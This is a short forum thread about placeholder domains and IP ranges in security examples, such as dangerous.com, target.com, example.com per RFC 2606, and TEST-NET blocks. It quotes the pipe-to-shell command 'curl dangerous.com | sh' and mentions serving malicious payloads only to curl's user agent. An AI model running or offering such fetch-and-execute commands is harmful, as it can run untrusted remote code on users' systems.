[rooodini]

> […] as dangerous as `curl dangerous.com | sh`.

dangerous.com appears to be a saucy outfits retailer. Irrespective of the name, piping the html to sh is probably fine.

[billyhoffman]

I often wonder about the results of people using functional hostnames in their examples. Most PoC exploit code use "target.com" as a place holder which makes sense, but hilariously is also the hostname for US retailer Target...

[glittershark]

This is exactly the reason example.com exists

[billyhoffman]

Yep. RFC2606 It is what they should use. And if you need to specify 2 hosts, you can use example.net and .org as well.

Unfortunately, the example domains don't convey context very well, so we see things like target.com, victim.com, etc

[varikin]

This can be corrected by target.example.com and victim.example.com. Conveys the context while remaining safe as an example.

[pimlottc]

That generally works, although in some cases it makes a difference whether two hosts are on the same tld; at the very least, it implies a connection between the two that may not always make sense (why is aggressor.example.com attacking victim.example.com?).

[xenophonf]

The same goes for TEST-NET (192.0.2.0/24), TEST-NET-2 (198.51.100.0/24), TEST-NET-3 (203.0.113.0/24), MCAST-TEST-NET (233.252.0.0/24), and the IPv6 documentation-only prefix (2001:db8::/32).

[Buge]

But of course they could do some fancy user agent check to only give malicious stuff when requested by curl.

[daurnimator]

heh. check out http://hashbang.sh it's both html and shell script :)